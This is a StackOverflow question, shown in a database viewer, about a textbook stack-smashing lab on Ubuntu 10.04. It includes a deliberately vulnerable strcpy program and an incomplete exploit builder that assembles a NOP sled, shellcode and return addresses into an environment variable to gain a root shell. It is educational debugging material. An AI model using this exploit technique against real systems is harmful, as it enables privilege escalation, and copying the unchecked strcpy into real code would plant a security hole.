Databases
StackOverflow2013
Postsdbo
POInstructions in C buffer being executed only as sudo
Body
 

Note that there are some explanatory texts on larger screens.

plurals
  1. POInstructions in C buffer being executed only as sudo
    text
    copied!<p>I'm working on a buffer overflow attack as described in Aleph One's article <a href="http://www.phrack.org/archives/49/p49_0x0e_Smashing%20The%20Stack%20For%20Fun%20And%20Profit_by_Aleph1.txt" rel="nofollow">Smashing the Stack for Fun and Profit</a>.</p> <p>As proposed in the article, I've written a program (shellcode.c) that plants the malicious code (shellcode) into an environment variable ($EGG). After which $EGG is passed as an argument to the program (vulnerable.c) that I wish to attack, causing a buffer in that program to overflow and resulting in execution of the shellcode.</p> <p>This is what the buffer looks like -</p> <p>[NNNNNNNNN...NNNNNNSSSSSSS...SSSSSSSRRRRR...RRRRRR]</p> <p>where N is the NOP instruction (see <a href="http://en.wikipedia.org/wiki/NOP_slide" rel="nofollow">NOP sled</a>), S is my shellcode, and R is an address (return address into the buffer that will cause Instruction Pointer to jump from code segment into the above stack buffer and begin executing instructions).</p> <p><strong>When I run the executables of shellcode.c and vulnerable.c as a normal user, I face the following problem -</strong> When the Instruction Pointer is redirected into the buffer and encounters an instruction, a segmentation fault results. <strong>However, upon executing the programs as sudo</strong>, the instructions in the buffer are executed without any problems and the subsequent shellcode in the buffer is successfully executed, bringing up a root terminal thus completing the exploit. <strong>Can anyone shed light on why this could be happening?</strong></p> <p>I have disabled the following protections - <em>Stack Smashing Protection</em>, <em>ASLR</em> and <em>Linux's NX</em> (eXecute Disable Bit).</p> <p>I am compiling using gcc 4.4.3 (Target: i486-linux-gnu) and executing on Ubuntu 10.04 (Lucid Lynx) running kernel 2.6.32.</p> <p>The following are my two programs:</p> <p><strong>vulnerable.c</strong></p> <pre><code>int main(int argc, char** argv) { char buffer[512]; if(argc&gt;1) strcpy(buffer,argv[1]); return (EXIT_SUCCESS); } </code></pre> <p><strong>shellcode.c</strong></p> <pre><code>int main(int argc,char** argv) { char *buff, *ptr; int *addr,retaddr; int i; int offset = DEFAULT_OFFSET; int buffersize = DEFAULT_SIZE; /* Set buffersize and predicted offset if arguments are supplied to the program */ if(argc&gt;1) buffersize = atoi(argv[1]); if(argc&gt;2) offset = atoi(argv[2]); if(!(buff=(char*)malloc(buffersize))) { printf("Can't allocate memory!"); exit(1); } retaddr = getStackPointer() - offset; printf("%d\n",strlen(shellcode)); printf("Using address: 0x%x\n",retaddr); addr = (int *)buff; for(i=0;i&lt;buffersize;i+=4) *(addr++) = retaddr; for(i=0;i&lt;buffersize/2;i++) buff[i] = NOP; ptr = buff + ((buffersize/2) - (strlen(shellcode)/2)); for(i=0;i&lt;strlen(shellcode);i++) *(ptr++) = shellcode[i]; buff[buffersize -1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash"); return (EXIT_SUCCESS); } </code></pre>
 

Querying!

 
Guidance
An individual column

Larger individual text columns get their own page to allow for proper reading.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload